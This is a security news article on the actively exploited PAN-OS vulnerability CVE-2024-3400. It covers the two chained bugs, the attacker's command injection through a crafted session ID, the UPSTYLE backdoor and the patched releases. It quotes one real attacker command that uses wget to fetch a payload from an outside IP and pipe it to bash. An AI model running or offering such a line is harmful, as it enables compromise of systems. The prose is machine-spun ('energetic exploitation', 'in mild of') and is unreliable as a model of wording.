Palo Alto Networks has shared extra particulars of a crucial safety flaw impacting PAN-OS that has come below energetic exploitation within the wild by malicious actors.
The corporate described the vulnerability, tracked as CVE-2024-3400 (CVSS rating: 10.0), as “intricate” and a mixture of two bugs in variations PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 of the software program.
“In the first one, the GlobalProtect service did not sufficiently validate the session ID format before storing them. This enabled the attacker to store an empty file with the attacker’s chosen filename,” Chandan B. N., senior director of product safety at Palo Alto Networks, mentioned.
“The second bug (trusting that the files were system-generated) used the filenames as part of a command.”
It is price noting that whereas neither of the problems are crucial sufficient on their very own, when chained collectively, they may result in unauthenticated distant shell command execution.
Palo Alto Networks mentioned that the menace actor behind the zero-day exploitation of the flaw, UTA0218, carried out a two-stage assault to attain command execution on inclined units. The exercise is being tracked below the identify Operation MidnightEclipse.
As beforehand disclosed by each Volexity and the community safety firm’s personal Unit 42 menace intelligence division, this includes sending specifically crafted requests containing the command to be executed, which is then run through a backdoor referred to as UPSTYLE.
“The initial persistence mechanism setup by UTA0218 involved configuring a cron job that would use wget to retrieve a payload from an attacker-controlled URL with its output being written to stdout and piped to bash for execution,” Volexity famous final week.
“The attacker used this method to deploy and execute specific commands and download reverse proxy tooling such as GOST (GO Simple Tunnel).”
Unit 42 mentioned it has been unable to find out the instructions executed through this mechanism – wget -qO- hxxp://172.233.228[.]93/coverage | bash – however assessed that the cron job-based implant is probably going used to hold out post-exploitation actions.
“In stage 1, the attacker sends a carefully crafted shell command instead of a valid session ID to GlobalProtect,” Chandan defined. “This results in creating an empty file on the system with an embedded command as its filename, as chosen by the attacker.”
“In stage 2, an unsuspecting scheduled system job that runs regularly uses the attacker-provided filename in a command. This results in the execution of the attacker-supplied command with elevated privileges.”
Whereas Palo Alto Networks initially famous that profitable exploitation of CVE-2024-3400 required the firewall configurations for GlobalProtect gateway or GlobalProtect portal (or each) and machine telemetry enabled, the corporate has since confirmed that machine telemetry has no bearing on the issue.
That is based mostly on new findings from Bishop Fox, which found bypasses to weaponize the flaw such that it didn’t require telemetry to be enabled on a tool with a purpose to infiltrate it.
The corporate has additionally expanded patches for the flaw over the previous few days to cowl different generally deployed upkeep releases –
- PAN-OS 10.2.9-h1
- PAN-OS 10.2.8-h3
- PAN-OS 10.2.7-h8
- PAN-OS 10.2.6-h3
- PAN-OS 10.2.5-h6
- PAN-OS 10.2.4-h16
- PAN-OS 10.2.3-h13
- PAN-OS 10.2.2-h5
- PAN-OS 10.2.1-h2
- PAN-OS 10.2.0-h3
- PAN-OS 11.0.4-h1
- PAN-OS 11.0.4-h2
- PAN-OS 11.0.3-h10
- PAN-OS 11.0.2-h4
- PAN-OS 11.0.1-h4
- PAN-OS 11.0.0-h3
- PAN-OS 11.1.2-h3
- PAN-OS 11.1.1-h1
- PAN-OS 11.1.0-h3
In mild of the energetic abuse of CVE-2024-3400 and the supply of a proof-of-concept (PoC) exploit code, customers are beneficial to take steps to use the hotfixes as quickly as potential to safeguard in opposition to potential threats.
The U.S. Cybersecurity and Infrastructure Safety Company (CISA) has additionally added the shortcoming to its Recognized Exploited Vulnerabilities (KEV) catalog, ordering federal companies to safe their units by April 19, 2024.
In response to info shared by the Shadowserver Basis, roughly 22,542 internet-exposed firewall units are possible weak to the CVE-2024-3400. A majority of the units are within the U.S., Japan, India, Germany, the U.Ok., Canada, Australia, France, and China as of April 18, 2024.
